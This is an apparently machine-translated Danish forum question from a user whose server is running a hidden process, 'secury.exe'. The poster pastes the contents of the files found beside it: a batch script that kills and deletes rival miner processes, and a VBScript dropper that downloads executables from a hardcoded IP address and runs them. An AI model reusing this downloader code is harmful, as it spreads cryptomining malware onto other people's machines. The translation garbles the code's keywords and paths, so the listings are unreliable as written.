Jeg har følgende situation i min task manager:
Jeg ved ikke, hvilken slags app det er, men absolut ikke Steam client bootstrapper, fordi jeg ikke installerede det og heller ikke kan afinstallere det.
Hvis jeg forsøger at finde ud af, hvilken slags app det er via dette trin:
Jeg ser noget sådan her:
I MS Config-værktøjet fandt jeg ikke noget, der ligner secury.exe.
Når jeg åbner filens placering, ser jeg tre filer:
m.bat, b.exe, 4. vbs.
Nedenfor går indholdet af m.bat:
taskkill / f / t / im secury.exe c: \ ProgramData \ secury.exe taskkill / f / t / im kingsoft.exe taskkill / f / t / im expl0rer.exe taskkill / f / t / im ieplare.exev taskkill / f / t / im nssm.exe taskkill / f / t / im MSASCui.exe taskkill / f / t / im SystemSettlngs.exe taskkill / f / t / im SystemSetting.exe taskkill / f / t / im Process.exe taskkill / f / t / im winlnlt.exe taskkill / f / t / im WindowsUpgrade.exe taskkill / f / t / im msdc.exe taskkill / f / t / im Fiddlere.exe taskkill / f / t / im shovst.exe taskkill / f / t / im lqrtqe.exe taskkill / f / t / im apkls.exe taskkill / f / t / im winlog.exe taskkill / f / t / im svchosts.exe taskkill / f / t / im win1ogins.exe taskkill / f / t / im shovsts.exe taskkill / f / t / im fcty.exe taskkill / f / t / im soiuos.exe taskkill / f / t / im TrustedInstaller.exe del C: \ Windows \ System32 \ soiuos.exe del C: \ Windows \ Setup \ TrustedInstaller.exe del C: \ ProgramData \ kingsoft.exe del C: \ ProgramData \ expl0rer.exe del C: \ ProgramData \ ieplare.exe del C: \ ProgramData \ nssm.exe del C: \ ProgramData \ MSASCui.exe del C: \ Pro gramData \ SystemSettlngs.exe del C: \ ProgramData \ SystemSetting.exe del C: \ ProgramData \ Process.exe del C: \ ProgramData \ winlnlt.exe del C: \ ProgramData \ WindowsUpgrade.exe del C: \ ProgramData \ msdc.exe del C: \ ProgramData \ Fiddlere.exe del C: \ ProgramData \ shovst.exe del C: \ ProgramData \ lqrtqe.exe del C: \ ProgramData \ apkls.exe del C: \ ProgramData \ winlog.exe del C: \ ProgramData \ svchosts.exe del C: \ ProgramData \ win1ogins.exe del C: \ ProgramData \ shovsts.exe del C: \ ProgramData \ fcty.exe del C: \ ProgramData \ pool.exe del C: \ ProgramData \ pool2.exe del C: \ ProgramData \ pool3.exe
Næste går 4vbs:
Indstil xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "GET", "http://223.68.209.7:65510/2.exe", 0 xPost.Send () Indstil sGet = CreateObject ("ADODB.Stream" ) sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: \ ProgramData \ s2.exe", 2 Indstil xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "GET", "http://223.68.209.7:65510/pool.exe", 0 xPost.Send () Indstil sGet = CreateObject ("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: \ ProgramData \ pool2.exe", 2 CreateObject ("WScript.Shell"). Kør "C: \ ProgramData \ pool3.exe" CreateObject (CreateObject "WScript.Shell"). Kør "del C: \ ProgramData \ pool3.exe"
Hvad kan jeg gøre for at stoppe secury.exe fra at misbruge computerens magt på min server?
PS Jeg har udført Avast fuld kontrol af min computer, men det fandt ikke noget galt.
Exe fra at misbruge computerens magt på min server?